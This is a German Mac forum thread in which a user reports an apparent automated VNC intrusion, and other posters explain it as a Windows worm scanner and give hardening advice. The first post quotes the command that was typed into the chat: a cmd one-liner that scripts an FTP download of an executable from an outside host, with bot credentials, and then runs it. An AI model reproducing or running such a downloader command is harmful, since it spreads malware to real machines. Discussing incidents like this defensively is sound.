In OSX eingedrungen ! Hack-Angriff ?!

SpArKy87 · 03.03.08

Hey Jungs, muss euch doch gerade mal von meinem Erlebnis erzählen:

War gerade gemütlich dran ein bisschen über Adium zu chatten, als plötzlich mein Screen-Sharing aktiviert wurde (erkennbar am kleinen Monitor der oben in der Leiste erscheint) und ich meine Maus nicht mehr bewegen konnte.

Plötzlich seh ich nur noch wie irgendwelche Code-Zeilen in mein Adium-Chatfenster mit nem Kumpel eingegeben werden. Dank der Adium-History hab ich sie noch:

Code:

%szstemroot%#szstem32#cmd.exe

und

Code:

cmd -c echo open ftpd.xbztey.com.ar 21 :: ik /echo user B0t ?A159753b :: ik /echo binarz :: ik /echo get DB.exe :: ik /echo bze :: ik /ftp ßn ßv ßsÖik /del ik /DB.exe /exit

Da der Hacker ja cmd.exe in system32 aufrufen wollte, gehe ich davon aus, dass eigentlich ein Windows-PC gehackt werden sollte. Komplett verzweifelt wollte ich dann Screen-Sharing deaktiveren, meine Maus hat allerdings nicht mehr funktioniert. Da ich per WLAN verbunden war, konnte ich dieses auch nicht deaktiveren und mir blieb nur mein Macbook auszuschalten!

Saukranke Geschichte irgendwie. Weil ich ab und an mal per SSH von der Arbeit aus auf mein Macbook zugegriffen habe, hab ich Port 22 geforwardet. Aber immer mit Passwortschutz und auch kein triviales wie "internet" oder so

Den Portforward habe ich erstmal wieder gelöscht, außerdem "Entfernte Anmeldung" und Screen-Sharing deaktiviert.

Was meint ihr, sollte ich jetzt neuinstallieren aufgrund der Gefahr das irgendwelche Programme installiert worden sein könnten?! Little Snitch meldet nichts auffälliges...

Auf jeden Fall sehr krass, wie einfach es scheinbar ist, an der Passwortsicherung vorbeizukommen und komplett zu übernehmen!
Was meint ihr?

Oli

OSX user · 03.03.08

Hi,

ich denke es heisst "sys32.exe" und es ist ein Windows Wurm/Spyware (ich würde versuchen, ihn mit nem Virenscanner zu entfernen).
Aber Don´t Panic es ist ein Win Virus kann dem Mac also nichts anhaben

Das von dir zitierte sieht aus wie ein Befehl dieses "Ding" runterzuladen.....hmmmm....
Hast du zufällig Windows Installiert (Paralles,(Bootcamp)...etc...)?????

Ich tippe darauf, dass Adium eine Fehler produziert hat. Dieses ganze ICQ Zeugs ist doch mit Windows Viren zugemüllt bis zum geht nicht mehr

Hoffe ich konnte helfen

PS:Auf jeden Fall schreibt dieser Wurm auf einer Ami Tastatur da z und y vertauscht sind....

Hier noch ma der Link: http://www.sophos.de/virusinfo/analyses/w32mytobk.html

OSX user · 03.03.08

Windows Virus

Einfach ClamxAV drüber laufen lassen.......!!!

Bier · 03.03.08

*g* leicht beeindruckbar seid ihr ja nicht?

remur · 04.03.08

Bier schrieb:
*g* leicht beeindruckbar seid ihr ja nicht?

Das dachte ich auch grade.
Also ich würde einen Mordsschreck bekommen

SpArKy87 · 04.03.08

also mich hats schon echt geflasht, vorallem als ich garnicht wusste, was ich tun sollte. Tippt da einfach irgendwer was auf meinem Macbook ohne das ich was mache... meine Maus hat gar nicht mehr reagiert, daher konnte ich weder WLAN deaktivieren, noch Screen-Sharing. War schon abgefahrn.

aber ich merk schon, euch lässt das eher kalt

gruß

MyCore · 04.03.08

Hi,

kanns sein das du VNC auf dem mac laufen hast?
Das von dir beschriebene läuft normal auf port 5900 ab.

Naja, also das was da geschehen ist, ist ganz einfach, da hat jemand fleisig nach exploits gescannt, bei dem Scannen werden per telnet auf diverse ports gewisse "codezeilen" gesendet die mit etwas glück auf eine unsiche windows kiste durchkommen. Dann wird mit dem befehl den du gesehen hast die file.exe geladen (die eigentlich von praktich keinem Virenscanner beanstandet wird) und ausgeführt. Diese *.exe datei (in Microsoft Visual C++ geschrieben) macht nichts anderes als ein paar kleine tools zu laden (nen ftpd, scann tool und nen kleinen irc bot) und zu starten. Wenn das auf ner windowskiste landet hat das "script-kind" die bestätigung durch den irc bot in nem vorher eingestellten Channel und kann entweder scanvorgänge von dem befallenen rechner aus starten um weitere rechner zu finden oder den rechner als ftp-dump missbrauchen, in den wehnigsten fällen werden darüber weitere software nachgeladen.

Aber abgesehen von der tatsache das der bei dir leider den auf mac nutzlosen befehl ausführen konnte ist das kein riesen problem für dich. Du solltest nur mal überlegen den port bzw. die sicherheitslücke zu schliesen. Aber es war kein gezielter hack angriff sondern einfach nur nen kleines tool am werk.

Ich tippe mal auf nen script-kiddie aus der fxp szene, das vorgehen war vor nen paar jahren von denen ganz groß in mode, hat aber mitlerweile etwas nachgelassen *lol*

Also kurzum, keine panik, VNC schliesen bzw. absichern und weiter langweilen xD

Homersektor7g · 04.03.08

Ein Windowsbefehl sollte über ein "icq" Fenster (Adium) auf einem Mac ausgeführt werden? o_O

:-D

Bier · 04.03.08

Bitte kauft sofort Bier AntiVir

. Das hilft: Herunterzuladen auf der Herstellerseite.

MyCore · 04.03.08

Homersektor7g schrieb:
Ein Windowsbefehl sollte über ein "icq" Fenster (Adium) auf einem Mac ausgeführt werden? :-D

nein, das script hat sich über einen VNC service auf den rechner eingeloggt, da das script nicht mit rechnet das es bei nem mac gelandet ist sonder denkt es wäre auf ner Windows kiste schiebt es einfach die befehle ein. Da zuletzt das Adium offen war und er was schreiben wollte ist das noch das aktive fenster und der sinnlose code wird da rein geschoben. also der angriff kam nicht über adium/icq

wolfsbein · 04.03.08

Wenn sich schon ein Script per VNC einloggen kann, so ist es fuer einen Menschen ein Leichtes. Ich wuerde mal schleunigst eine Firewall vor den Mac haengen. Ansonsten sind alle Daten von aussen einseh- und aenderbar.

MacApple · 04.03.08

MyCore schrieb:
kanns sein das du VNC auf dem mac laufen hast?

Er hat ja geschrieben, dass er Screen Sharing an hatte. Da ist ja VNC.

MacApple

Bier · 04.03.08

Selbiges widerfuhr auch diesem armen Zeitgenossen. Er jedoch hatte ScreenSharing deaktiviert. Gehacktangrifft!

Rastafari · 04.03.08

wolfsbein schrieb:
Wenn sich schon ein Script per VNC einloggen kann, so ist es fuer einen Menschen ein Leichtes. Ich wuerde mal schleunigst eine Firewall vor den Mac haengen. Ansonsten sind alle Daten von aussen einseh- und aenderbar.

Und hinter einer Firewall ändert sich was?

wolfsbein · 04.03.08

Rastafari schrieb:
Und hinter einer Firewall ändert sich was?

Provizier doch nicht immer so, du weisst es ganz genau. Hinter der Firewall kann von aussen keiner mehr zugreifen, falls der Zugriff nur aus dem Heimnetz gewuenscht ist. Ansonsten ist VNC gaenzlich ungeeignet, weil es per Default nicht verschluesselt. Daher muss ein SSH-Tunnel her. Und den SSH Port kann man dann problemlos forwarden, solange man sich ein gescheites Passwort einfallen laesst.

scaramangado · 04.03.08

remur schrieb:
Das dachte ich auch grade.
Also ich würde einen Mordsschreck bekommen

Wieso das denn? Soweit ich weiß bekommt jeder der es schafft einen Mac zu hacken von Apple 50000$. Und das haben bisher höchstens zwei Leute geschafft. Also ein Hack war das sicher nicht.

Bier · 04.03.08

wolfsbein schrieb:
Provizier doch nicht immer so, du weisst es ganz genau. Hinter der Firewall kann von aussen keiner mehr zugreifen, falls der Zugriff nur aus dem Heimnetz gewuenscht ist.

Und wenn Du die Refused Packages aktiv droppst? Firewalls dienen der Netzwerktrennung, schon richtig... Aber glaub man ja nicht, dass das Zauberei ist.

In OSX eingedrungen ! Hack-Angriff ?!

Idared

Golden Delicious

Golden Delicious

Pomme au Mors

Ontario

Idared

Alkmene

Zuccalmaglios Renette

Pomme au Mors

Alkmene

Jerseymac

Schöner von Bath

Pomme au Mors

deaktivierter Benutzer

Jerseymac

scaramangado

Gast

Pomme au Mors

Wir schützen Ihre Privatsphäre

Informationen auf einem Gerät speichern und/oder abrufen

Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen (Optionale Cookies)

Datenübermittlung an Partner in anderen Staaten (Drittanbieter-Cookies)